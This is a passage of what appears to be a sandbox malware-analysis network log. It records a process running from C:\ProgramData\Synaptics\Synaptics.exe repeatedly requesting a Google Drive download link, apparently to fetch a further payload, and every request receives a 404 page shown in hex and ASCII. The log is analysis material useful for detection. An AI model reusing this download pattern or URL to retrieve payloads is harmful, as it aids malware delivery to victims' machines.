                                                                                                                                                                                        2022-05-17 11:31:56 UTC603INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:56 UTC603INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        199192.168.2.349973142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC600OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:56 UTC603INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Kfl1EHKXWD2blZOoBHUgNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:56 UTC605INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:56 UTC605INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 56 48 73 76 51 58 61 53 37 4e 32 65 48 6d 4b 36 65 47 4d 2f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rVHsvQXaS7N2eHmK6eGM/w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:56 UTC606INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:56 UTC606INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        2192.168.2.349736142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:29 UTC6OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:29 UTC6INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:29 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Mm99I63QtTPFJxaKXlAXDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:29 UTC7INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:29 UTC7INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 74 50 6c 35 72 49 67 58 74 52 47 6d 67 53 70 32 67 63 63 32 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ktPl5rIgXtRGmgSp2gcc2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:29 UTC9INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:29 UTC9INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        20192.168.2.349757142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:31 UTC59OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:31 UTC62INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:31 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GLQbmHedOpEGGP0kWp1hRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:31 UTC64INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:31 UTC64INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 58 43 36 66 53 64 50 70 43 62 79 43 69 4e 67 30 6a 46 72 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mXC6fSdPpCbyCiNg0jFrQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:31 UTC65INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:31 UTC65INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        200192.168.2.349974142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC603OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:56 UTC606INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BeUbZL+oiNE39U/mdT+l5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:56 UTC608INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:56 UTC608INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 49 47 63 33 54 61 67 72 53 62 4d 48 38 69 43 51 6a 31 52 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CIGc3TagrSbMH8iCQj1RHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:56 UTC609INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:56 UTC609INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        201192.168.2.349975142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC606OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:56 UTC609INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7ZL3t1yYfGgznLfwaAeBMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:56 UTC611INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:56 UTC611INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 39 51 4f 51 2f 53 6e 45 39 47 4f 66 33 67 66 64 51 41 70 2b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
